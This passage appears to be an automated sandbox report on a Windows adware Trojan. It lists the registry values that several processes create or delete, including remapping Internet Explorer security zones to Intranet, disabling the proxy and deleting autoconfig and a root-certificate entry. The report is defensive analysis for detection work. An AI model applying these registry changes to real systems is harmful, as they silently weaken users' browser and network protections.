"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\ActSys]
"instid" = "FVz40gdklAiQUMMUD3ARa8NDKI9Pp0VX"

The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings to map all local web nodes without dots that are not assigned to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in the system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"E9C15E05782C5BADC4287A994D1DDEDB171B8B2A"

The process ActSys.exe:2440 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 BC 36 45 A7 A1 90 29 04 1B E2 92 15 F3 1E 25"

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 4B 0A E5 61 BA 54 65 0D 62 D2 C3 BD 6C 11 39"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\WNet]
"Version" = "1.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Comments" = "The best offers in internet just one click away from you (ID: HTk3wxj1YXaXLjmPTfdUb6)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"DisplayVersion" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Publisher" = "BR SOFTWARE LLC"
"DisplayName" = "WNet"
"QuietUninstallString" = "%Program Files%\WNet\uninst.exe"
"UninstallString" = "%Program Files%\WNet\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process cmdshell.exe:3548 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F CE A6 C2 99 E6 A4 9B 41 99 37 6E 2F D6 4A 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security zone settings to map all local web nodes without dots that are not assigned to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process amisetup5755__9664.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCR\espial.deiform]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}]
"(Default)" = "IBoot"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\TypeLib]
"(Default)" = "{89c1a748-b869-4016-8319-4d690ad9fb4a}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\VersionIndependentProgID]
"(Default)" = "espial.deiform"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCR\espial.deiform.1\CLSID]
"(Default)" = "{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}"

[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\TypeLib]
"(Default)" = "{89C1A748-B869-4016-8319-4D690AD9FB4A}"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\espial.deiform.1]
"(Default)" = "Inst Class"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\Version]
"(Default)" = "1.0"

[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup5755__9664.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0]
"(Default)" = "InstallerLib"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1429772524"

[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup5755__9664.exe"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}]
"(Default)" = "Inst Class"

[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 CA 87 11 14 2E 2D 07 1C 5A 41 3E 05 2D 8C 64"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup5755__9664.exe"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup5755__9664\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup5755__9664.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\ProgID]
"(Default)" = "espial.deiform.1"

[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\espial.deiform\CurVer]
"(Default)" = "espial.deiform.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

The Trojan modifies IE security-zone settings so that all network paths (UNCs) are mapped to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE security-zone settings so that all local (intranet) sites not listed in other zones (dotless host names) are mapped to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\VersionIndependentProgID]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid32]
[HKCR\espial.deiform.1]
[HKCR\espial.deiform\CurVer]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\0\win32]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\0]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\FLAGS]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\HELPDIR]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid]
[HKCR\espial.deiform.1\CLSID]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\Programmable]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}]
[HKCR\espial.deiform]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\ProgID]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\Version]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\TypeLib]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\TypeLib]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
"ServerExecutable"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup5755__9664\DEBUG]
"Trace Level"

The process nfregdrv.exe:976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 2D A1 B6 B6 CA 07 B2 99 CE D4 A8 0D 24 2A C5"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

The process nfregdrv.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC B8 71 18 71 E6 BE 5D 5D 3B 37 A7 5B 5E C1 72"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

The process %original file name%.exe:1396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 9A DA 6E 4F 35 B6 2A A8 D8 19 6A D6 1E 73 9B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security-zone settings so that all network paths (UNCs) are mapped to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all local (intranet) sites not listed in other zones (dotless host names) are mapped to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp]
"QQBrowser.exe" = "QQ浏览器"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 D8 12 C4 55 2B 78 AC 9B 09 50 FE EC 40 EE 4A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp\tmp,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security-zone settings so that all network paths (UNCs) are mapped to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all local (intranet) sites not listed in other zones (dotless host names) are mapped to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process CashReminder.exe:1232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
